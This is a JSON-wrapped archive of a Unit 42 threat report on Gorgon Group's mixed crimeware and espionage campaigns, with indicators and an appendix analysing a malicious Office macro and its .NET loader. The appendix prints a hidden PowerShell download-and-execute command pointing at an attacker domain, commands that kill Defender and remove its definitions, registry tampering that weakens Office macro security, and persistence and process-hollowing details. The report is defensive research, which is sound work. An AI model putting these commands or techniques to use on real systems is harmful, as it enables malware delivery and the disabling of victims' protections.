{
	"id": "51787a93-4169-4a46-9d44-11eb812e2f67",
	"created_at": "2026-04-06T00:21:08.86184Z",
	"updated_at": "2026-04-10T03:35:56.576467Z",
	"deleted_at": null,
	"sha1_hash": "00b5096fa62da3207a20ccc6fe9d0a029f88780c",
	"title": "The Gorgon Group: Slithering Between Nation State and Cybercrime",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2342010,
	"plain_text": "The Gorgon Group: Slithering Between Nation State and Cybercrime\r\nBy Robert Falcone, David Fuertes, Josh Grunzweig, Kyle Wilhoit\r\nPublished: 2018-08-02 · Archived: 2026-04-02 10:41:56 UTC\r\nUnit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed\r\ntargeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of\r\nindividuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis\r\nof some of the attacks, as well as attribution links to Pakistani actors, has already been described by 360 and Tuisec, who\r\nfound interesting connections to a larger group of attackers that Unit 42 researchers have been tracking, which we are\r\ncalling Gorgon Group.\r\nIn addition to the numerous targeted attacks, Unit 42 discovered that the group also performed a litany of attacks and\r\noperations around the globe, involving both criminal and targeted attacks.\r\nStarting in February 2018, Palo Alto Networks Unit 42 identified a campaign of attacks performed by members of Gorgon\r\nGroup targeting governmental organizations in the United Kingdom, Spain, Russia, and the United States. Additionally,\r\nduring that time, members of Gorgon Group were also performing criminal operations against targets across the globe, often\r\nusing shared infrastructure with their targeted attack operations.\r\nGorgon Group's activity is interesting because, in addition to traditional command and control (C2) domain utilization,\r\nGorgon Group used common URL shortening services to download payloads, ultimately providing an extensive list of click\r\ncounts and statistical data. Also, interestingly, Gorgon Group has a diverse and active criminal element. On much of the C2\r\ninfrastructure we identified several crimeware family samples. 
RATs such as NjRat and infostealers like Lokibot were\r\nleveraging the same C2 infrastructure as that of the targeted attacks.\r\nBoth styles of attack, relying on numerous decoy documents and phishing emails, lacked overall sophistication, but the\r\neffectiveness of this group and campaign cannot be denied.\r\nAttack Delivery and Infrastructure Analysis\r\nThe attack methodology, as well as analysis of several of the \".vbs\", \".doc\" and \".exe\" samples found hosted on the attacker's\r\ninfrastructure, has been covered by 360 and Tuisec. Both 360 and Tuisec found that the most commonly observed and\r\nconsistent attack pattern consists of the following stages:\r\nFigure 1. Basic attacker methodology\r\nAt the initial stage, the phishing attempts are kept very simple and lightweight by using OLE2Link objects that will usually\r\nmake use of URL shortening services such as Bitly and t2m[.]io.\r\nFigure 2. OLE2Link content example\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 1 of 27\n\nWhile investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers\r\nwitnessed several common operational security flaws among Gorgon Group's actors throughout their many campaigns. It was\r\none of these OPSEC failures that gave us an interesting cross-section of the malware Gorgon Group is using. Included in the\r\ndirectories were a combination of files leveraged in the targeted attacks against nation states mentioned above. Additionally,\r\nthere was a plethora of malware samples that were criminal in nature.\r\nFigure 3. Open directory listing of hxxp://stevemike-fireforce[.]info/\r\nBased on the contents and structure of the initially identified open directories, it was possible to find several infrastructure\r\npatterns in use. 
An example of a domain structure and malware delivery contents is shown in the following table:\r\nSHA-256 Infrastructure URL\r\n4e4967e3d39256049bc1054b966e5c609245fd3b2a934fda5cd1885526d8221e stemtopx[.]com/work/1.doc\r\nd2f58b08f8abfe5055f3c1f0b8d991dfe1deb62807a5336b134ce2fb36d87284 stemtopx[.]com/work/3.exe\r\ndb4d8d931f1b979cf32d311f9b03e851d3283b4f7e86252730247da25cf9f093 stemtopx[.]com/work/2.exe\r\n4c6e3d8fdb2394edffe4a5bc45a238749e929301efa8bcfa3a247b1ab68eac54 stemtopx[.]com/work/1.exe\r\n81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e stemtopx[.]com/work/new/20.exe\r\n26151f1e24bc97532e49013fbe04919de1f51e346dba1f10ce2e389160f2fb9d stemtopx[.]com/work/new/3.exe\r\na100ce0a67c5890bcc38d2b6e30f9164dfe266126ec40a2fd7eb8e941dc7d025 stemtopx[.]com/work/new/2.exe\r\n806098afc2148dabb838b24c4dfaa148269ac3ddf769aee54e75d46bfef0c506 stemtopx[.]com/work/doc/20.doc\r\nbf37d6cb393b440f790ad2b333624fde079e10bfaeb44d65188e3ccc551c982f stemtopx[.]com/work/k/1.docx\r\n81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e stemtopx[.]com/work/k/1s.exe\r\nTable 1. Malware samples and infrastructure for hxxp://stemtopx[.]com\r\nPattern Example\r\n[domain]/work/docnew/[filename]\r\n[domain]/administrator/help/[filename]\r\n[domain]/xe/m/[filename]\r\n[domain]/xe/s/[filename]\r\n[domain]/images/yupsia/exe/[filename]\r\n[domain]/images/yupsia/doc/[filename]\r\nTable 2. Examples of domain patterns\r\nThe Gorgon Group Crew Breakdown\r\nFinding accessible directories, in combination with their other operational security failures, made it easy to start connecting\r\nthe dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat,\r\nwe counted four additional actors performing attacks as part of Gorgon Group. 
While it's not known if the attackers\r\nphysically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas.\r\nfudpages\r\nOne member of Gorgon Group, whom we are calling 'fudpages', was found during this campaign activity based on their use\r\nof shared infrastructure. One specific Microsoft Word document drew our attention\r\n(446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25).\r\nThis Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this\r\ndocument pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members.\r\nAdditionally, this document communicates with a relatively new piece of C2 infrastructure, umarguzardijye[.]com, which is\r\nhosted on 91[.]234[.]99[.]206.\r\nFigure 4. WHOIS information for umarguzardijye[.]com\r\nFudpages made many of the same OPSEC mistakes as the other Gorgon Group members.\r\nFigure 5. Open directory of umarguzardijye[.]com\r\nThe WHOIS record for our new domain, umarguzardijye[.]com, shows that the registrant organization is \"fudpages\" and that the\r\naddress provided is in Pakistan. When looking closer at the IP hosting umarguzardijye[.]com, we noticed 91[.]234[.]99[.]206\r\nhosts two additional domains that drew our attention, fudpages[.]ru and fudpage[.]ru. 
Fudpage appears to be a small\r\nmarketplace selling bulletproof hosting, RDP sessions, fake documents and a litany of additional malicious wares.\r\nFigure 6. Advertisement website for FUD pages and spamming tools\r\nListed on fudpage's marketplace are several pieces of contact information, which ultimately led us to an underground\r\npersona that was selling, distributing and trading malicious tooling across underground forums.\r\nFigure 7. Underground forum posting for RAT\r\nOperating underground since at least 2016, fudpages is also active on streaming sites such as YouTube, which they use as an\r\nadvertising platform.\r\nFigure 8. YouTube video posting on how to perform malicious activities\r\nAs with all of Gorgon Group's members, fudpages' online profile and standardized use of infrastructure connect them\r\nback to Gorgon Group. This connection helps illustrate the seemingly standardized methodologies Gorgon\r\nGroup most often employs.\r\nThe Tale of Two Intentions: Criminal and Targeted\r\nAs part of the investigation, Unit 42 researchers were able to identify an interesting characteristic of how the Gorgon\r\nGroup crew shares infrastructure between cybercrime and targeted attacks. The crew pursues both regular crime and\r\ntargeted attack objectives using the same domain infrastructure over time, rarely changing their TTPs.\r\nStarting in mid-February, Unit 42 researchers have been tracking an active campaign sharing a significant portion of the\r\ninfrastructure leveraged by Gorgon Group for criminal and targeted attacks. 
In Figure 9, below, red indicates targeted IP\r\naddresses, malware, registrant information, and domains associated with the targeted attack campaign, while blue indicates\r\ncriminal attack IP addresses, malware used, registrant information, and domains:\r\nFigure 9. Overlap between infrastructure\r\nWhile looking at the total cluster of Gorgon Group activity, it's also interesting to look at the total click volume during the\r\ncampaign's timeframe. Leveraging Bitly click counts for the campaign, we were able to see Gorgon Group's activity\r\nvolume increase throughout April.\r\nFigure 10. Total clicks performed on Gorgon Group infrastructure over time\r\nLooking specifically at one domain used in both cybercrime and targeted attacks gives us a micro-level view of their\r\ncampaign. Between April 1, 2018 and May 30, 2018, we observed the domain stevemike-fireforce[.]info used in a Gorgon\r\nGroup cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack. 
This same domain\r\nwas also used during the same period of time in targeted attacks against several worldwide nation state agencies.\r\nAnalysis of the data allowed Unit 42 researchers to make some interesting conclusions:\r\nSeveral unique domains are used for both cybercrime and targeted attacks.\r\nThe number of sessions for cybercrime is higher than for targeted attacks, as expected.\r\nThere is no specific pattern to when targeted attacks happen; a domain can initially be used for cybercrime and\r\nthen quickly be used in a targeted attack with little warning.\r\nAs a graphical representation, Figure 11, below, indicates the number of unique sessions observed for this domain over the\r\ncampaign's operational time, representing the attack intention in two separate areas.\r\nNotably, on April 24th this domain delivered a targeted attack aimed at several worldwide governmental\r\nbodies while it was also being used to deliver a malspam campaign. The subject used in this case of\r\ntargeted attack was \"Pakistan eying Sukhoi-35 figther planes as part of defense deal from Rusia\":\r\nFigure 11. Crimeware activity versus targeted activity against stevemike-fireforce[.]info\r\nIn order to have a better idea of the volume of unique attacks per date and intention, see the following volume-based\r\nrepresentation in Figure 12, where targeted attack volumes are represented in red and crime in green:\r\nFigure 12. 
Volume of crimeware activity versus targeted attacks using stevemike-fireforce[.]info\r\nFocusing on one domain allowed us to quickly understand its usage and better understand how it interconnects with a larger\r\nmalspam campaign.\r\nIntention #1: Cybercrime\r\nCriminal attacks are not new to this crew; some were covered in our previous blog on Gorgon Group member\r\nSubaat. During the current campaign, Gorgon Group's criminal enterprises netted 132,840 Bitly clicks from mid-February to\r\nthe present. Hitting a large cross-section of industries, there was little in terms of targeting during their criminal activity.\r\nFigure 13. Criminal Attacks Bitly Link Clicks Worldwide\r\nA majority of the crimeware distribution was done via standard malspam campaigns leveraging well-known \"Purchase\r\nOrder\" and \"SWIFT\" lures. Most of the filenames were variations of the following:\r\nSWIFT {Date}.doc\r\nSWIFT COPY.doc\r\nPURCHASE ORDER {Random Value}.doc\r\nDHL_RECEIPT {Random Value}.doc\r\nSHIPPING RECEIPT {Date}.doc\r\nThe tools used by the crew do not really differ between general crime and more targeted attacks; in both cases they are\r\nremote access and data-stealing malware families. 
The top five malware families identified as criminal in nature so\r\nfar have been the following:\r\nNjRAT: NjRAT is a remote-access Trojan commonly seen in both criminal and targeted attacks since as early as 2013.\r\nRevengeRAT: RevengeRAT is a remote-access Trojan that was released for free on underground forums in 2016.\r\nWhile RevengeRAT could be used in targeted attack campaigns, it is commonly witnessed in criminal malspam\r\ncampaigns.\r\nLokiBot: LokiBot is a commodity malware sold on underground sites which is designed to steal private data from\r\ninfected machines, and then submit that data to a command and control host via HTTP POST. This private data\r\nincludes stored passwords, login credentials from web browsers, and a variety of cryptocurrency wallets.\r\nRemcosRAT: RemcosRAT is a remote-access Trojan that first appeared in underground forums in July of 2016.\r\nRemcosRAT has a feature-rich builder, which allows for the creation of Microsoft Word documents with malicious\r\nmacros.\r\nNanoCoreRAT: Generally delivered via phishing, NanoCoreRAT is a remote-access Trojan that opens a back door and\r\nsteals information from the compromised computer.\r\nOne interesting note about the criminal activity of Gorgon Group is their usage of Bitly. Similar to their targeted\r\nattacks, Gorgon Group leveraged Bitly for distribution and shortening of C2 domains. Using the same techniques across\r\nboth their criminal and targeted activity made it easier for us to cluster Gorgon Group infrastructure and activity.\r\nFigure 14. 
Clicks on Bitly links in criminal attacks\r\nOverall, in spite of the lack of sophistication in Gorgon Group's activity, they were still relatively successful, proving once\r\nagain that simple attacks against individuals without proper protections work.\r\nIntention #2: Targeted Attacks\r\nBeginning in early March 2018, Unit 42 started observing targeted attacks against Russian, Spanish and United States\r\ngovernment agencies operating in Pakistan. As we continued to investigate, it became apparent that Gorgon Group had been\r\nconsistently targeting worldwide governmental organizations operating within Pakistan. While Gorgon Group has been\r\nmaking minor changes in their methodologies, they are still actively involved in both targeted and criminal attacks.\r\nThis Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199.\r\nThe spear phishing emails involved in this campaign would most often originate from Gmail accounts masquerading as\r\nlegitimate individuals, such as a prominent Lt. Col. in the Pakistani military.\r\nThe subjects of the spear phishing emails were also interesting, often containing subject matter related to terrorist groups,\r\nmilitary activity, or political topics:\r\nActing FOREIGN Minister of Pakistan\r\nInvitation to lady wives of H.E. Ambassador/High Commissioner from lady wife of H.E. 
High Commissioner of\r\nBangladesh\r\nPakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143\r\nPG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan\r\nPress Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018\r\nAfghan Bomb Blast report by ISI\r\nUSAJOBS Daily Saved Search Results for New GS15 for 3/30/2018\r\nHow Rigging take place in Senate Elections in Pakistan\r\nAfghan Terrorist group details ISI Restricted113\r\n1971 Liberation War Freedom Fighters in Pakistan Army Custody Database\r\nAdditionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included):\r\nLiberation Freedom Fighter.xlam\r\nNSC details of participants.xlam\r\nRaw Sect Vikram report on Pak Army Confidential.doc\r\nUSA Immagration Policy for Families.ppam\r\ndoc\r\nCV FM.doc\r\ndoc\r\nSukhoi35 deal report.doc\r\nNominal Roll.doc\r\nPress Release 17 April.doc\r\nAfghan Blast report by ISI.doc\r\nRigging in Pakistan Senate.doc\r\nAfghan Terrorist group report.doc\r\nThe payloads for these attacks varied in malware family. The popular NanoCoreRAT, QuasarRAT, and NJRAT variants were\r\nused heavily.\r\nIn a number of these attacks, the popular third-party URL shortening service Bitly was used to ultimately deliver the\r\npayloads.\r\nIt is important to remember that, while we used Bitly links to help gauge click location, anyone who clicks these links\r\n(including researchers) is also counted. So, while this click information is valuable, it is only one small piece of a\r\nlarger picture related to targeting.\r\nFigure 15. Bitly Click Information Related to a Gorgon Group C2 Domain\r\nThe heaviest concentration of Bitly URL interaction came from Pakistan, which at 410 clicks accounted for 39% of all\r\nclicks. 
The United States amassed 194 clicks, accounting for 19%.\r\nFigure 16. Clicks on Bitly links in targeted attacks\r\nThe attacks took place primarily in March, late April, and early May of 2018.\r\nConclusion\r\nGorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks. What makes\r\nGorgon Group unique is that, despite the group's operational security failures, it still remained particularly effective.\r\nLooking closer at the actors participating in Gorgon Group gave us a unique perspective into the inner workings of an attack.\r\nLeveraging the same infrastructure for targeted attacks and criminal enterprises made for an interesting cross-section of\r\nmixed intentions. Ultimately, this led us to the conclusion that several of Gorgon Group's members have a nexus in\r\nPakistan. While Gorgon Group remains active, Palo Alto Networks customers are protected from this threat in the following\r\nways:\r\nWildFire detects all current Gorgon Group files with malicious verdicts.\r\nAutoFocus customers can track these samples with the Gorgon Group actor tag.\r\nTraps blocks all of the files currently associated with Gorgon Group.\r\nAppendix\r\nAnalysis of a targeted attack\r\n\"1971 Liberation War Freedom Fighters in Pakistan ArmyCustody Database98\"\r\nThe delivery documents used in the targeted attacks are Microsoft Office documents that contain a macro that attempts to\r\ncompromise the system. The infection process is rather interesting, as it involves multiple layers of .NET assemblies that\r\nwill eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another\r\nprocess. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. 
The infection\r\nprocess not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the\r\nrecipient's suspicions of the entire process. Additionally, the process attempts to lower the overall security of the system by\r\ndisabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the\r\ndeveloper wraps the malicious code with legitimate source code freely available online.\r\nDelivery document\r\nThe delivery document contains a macro that downloads an executable from a remote server. The macro downloads a\r\npayload from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.exe (SHA256:\r\n84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line\r\nprocess:\r\ncmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel[.]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exe'\r\nThe mixed-case \"System.NeT.WeBClieNT\" is a trivial evasion of case-sensitive string matching; PowerShell resolves .NET type\r\nnames case-insensitively, so the command works unchanged.\r\nThe macro then attempts to kill Microsoft Office and Windows Defender processes using the 'taskkill' command. The\r\ncommand does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel\r\nin the case of this \".xlam\" file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher.\r\nThis blanket approach to killing the appropriate process suggests that the actor does not change this command within their\r\nmacro across the delivery documents they created for these Microsoft Office applications. The command does not just\r\nattempt to kill the Windows Defender process, but also attempts to clear the detection definitions so as not to trigger an antivirus\r\nalert. 
The macro performs all of these activities with the following command:\r\ncmd /c taskkill /f /im winword.exe\u0026taskkill /f /im Excel.exe\u0026taskkill /f /im MSPUB.exe\u0026taskkill /f /im POWERPNT.EXE\u0026taskkill /f /im MSASCuiL.exe\u0026taskkill /f /im MpCmdRun.exe\u0026cd \"\"%ProgramFiles%\\Windows Defender\"\" \u0026 MpCmdRun.exe -removedefinitions -dynamicsignatures \u0026 exit\r\nThe macro also attempts to deactivate security mechanisms within Microsoft Office products by modifying the registry.\r\nFirst, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel (11.0 through\r\n16.0, i.e. Office 2003 through Office 2016) by setting the following registry values to 1; a VBAWarnings value of 1 corresponds to\r\n\"Enable all macros\", so later macro-laden documents run without a prompt:\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings\r\nThe macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and\r\nPowerPoint by setting the following registry values to 1:\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\n(The misspelling \"DisableAttachementsInPV\" is Microsoft's own value name, not a typo in the macro.) These are per-user Trust\r\nCenter settings; the equivalent values set by Group Policy under HKCU\\Software\\Policies\\Microsoft\\Office take precedence, so\r\nhosts where macro and Protected View settings are enforced by policy are not weakened by this tampering, and a sudden\r\nappearance of these values under HKCU\\Software\\Microsoft\\Office is itself a useful detection signal.\r\nFirst Stage Payload\r\nThe payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and\r\ndecoy document. It appears the author of this downloader used the source code from an open source tool called \"Sales\r\nSystem Application\", which is freely available at hxxp://www.a1vbcode[.]com/app-2999.asp. We believe the author of the\r\ndownloader uses this Sales System Application to provide a legitimate look to their malicious payload. The malware author\r\nadds their own code to the application to run their malicious code before calling the legitimate functions that display the\r\ngraphical user interface. 
The following functions are called when the application attempts to initialize the menu:\r\nETransaksi.Speed();   // Legitimate class, but this method is the first wrapped function that leads to the malicious code\r\nProjectData.EndApp(); // Closes the application before the rest of the legitimate Sales System Application functions are called\r\nThe \"Speed\" method in the legitimate ETransaksi class contains legitimate code from the Sales System Application;\r\nhowever, the author of this tool wraps this code in an if/else construct whose condition is always false, so the legitimate code is\r\nskipped and execution proceeds to the next step of the malicious chain. The following code example shows the always-false\r\nflag being set (5 \u003e 155) and the ETransaksi.diomadnfagaghagh method being called:\r\nint num = 5;\r\nint num2 = 155;\r\nbool flag = num \u003e num2; // always false\r\nif (flag)\r\n{\r\n    \u003clegitimate Sales System Application code\u003e\r\n}\r\nelse\r\n{\r\n    NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[]\r\n    {\r\n        null,\r\n        new object[0]\r\n    }, null, null, null, true);\r\n}\r\nThe payload uses this technique to run a chain of methods that eventually carry out its malicious task. With the exception of\r\nthe 'Speed' method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen\r\nin the following list:\r\n1. ETransaksi.Speed\r\n2. ETransaksi.diomadnfagaghagh\r\n3. ETransaksi.fjcsERIfjfiojsGHIsdifjksi\r\n4. ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl\r\n5. ETransaksi.FJaioefgkaoeK\r\nThe last two methods in the chain carry out a majority of the first payload's functionality. 
The\r\nETransaksi.gsgjIDJIGJIGJIGJIFDOSpl method obtains a resource named \"fgjfaieSDFAOKEfj.GSrdofjksrgj\", which is\r\ndecrypted in the ETransaksi.FJaioefgkaoeK method using a multibyte XOR cipher with the following 16-byte key:\r\nbyte[] array = new byte[]\r\n{\r\n    19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248\r\n};\r\nThe resulting cleartext is another .NET assembly, which the payload loads within its own process space.\r\nEmbedded Trojan\r\nThe Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and\r\nexecute a secondary payload, as well as to download and open a decoy document. An unknown programmatic builder\r\ntool appears to have created this Trojan, as the code shows multiple configuration options for additional functionality that\r\nwere not enabled within this specific sample.\r\nUpon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an\r\nembedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the\r\nembedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the\r\n\"B\" resource, so this functionality does not carry out any activities; rather, it just causes an exception and the Trojan continues running.\r\nAnother configuration option encountered by this Trojan is a check for '%STARTUPON%'. 
This sample was not configured\r\nto execute with this option enabled; however, should this option be enabled, the Trojan would attempt to install itself to the\r\nsystem at a specific location by writing its contents in base64-encoded format to the following file:\r\n%APPDATA%\\Microsoft\\Windows\\DsvHelper\\%DECRY%.txt\r\nThe Trojan then reads the contents of the %DECRY%.txt file, decodes them and writes the decoded data to the following file:\r\n%USERPROFILE%\\APPDATA\\Roaming\\Microsoft\\Windows\\DsvHelper\\@RANDOM@.exe\r\nThe Trojan would then create a new process using the @RANDOM@.exe file. When the Trojan runs as an executable\r\nwithin the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. It\r\nthen creates the following registry key to automatically run the Trojan each time the system starts:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@\r\nThe main behavior carried out by this Trojan involves obtaining an embedded executable, hollowing the current Trojan process,\r\nwriting the new embedded executable to the process memory and calling a specific function in the newly written payload.\r\nThe embedded payload written to process memory exists in the \"R\" resource, and the called function in the new payload is\r\nnamed \"RPe.Test.Work\". 
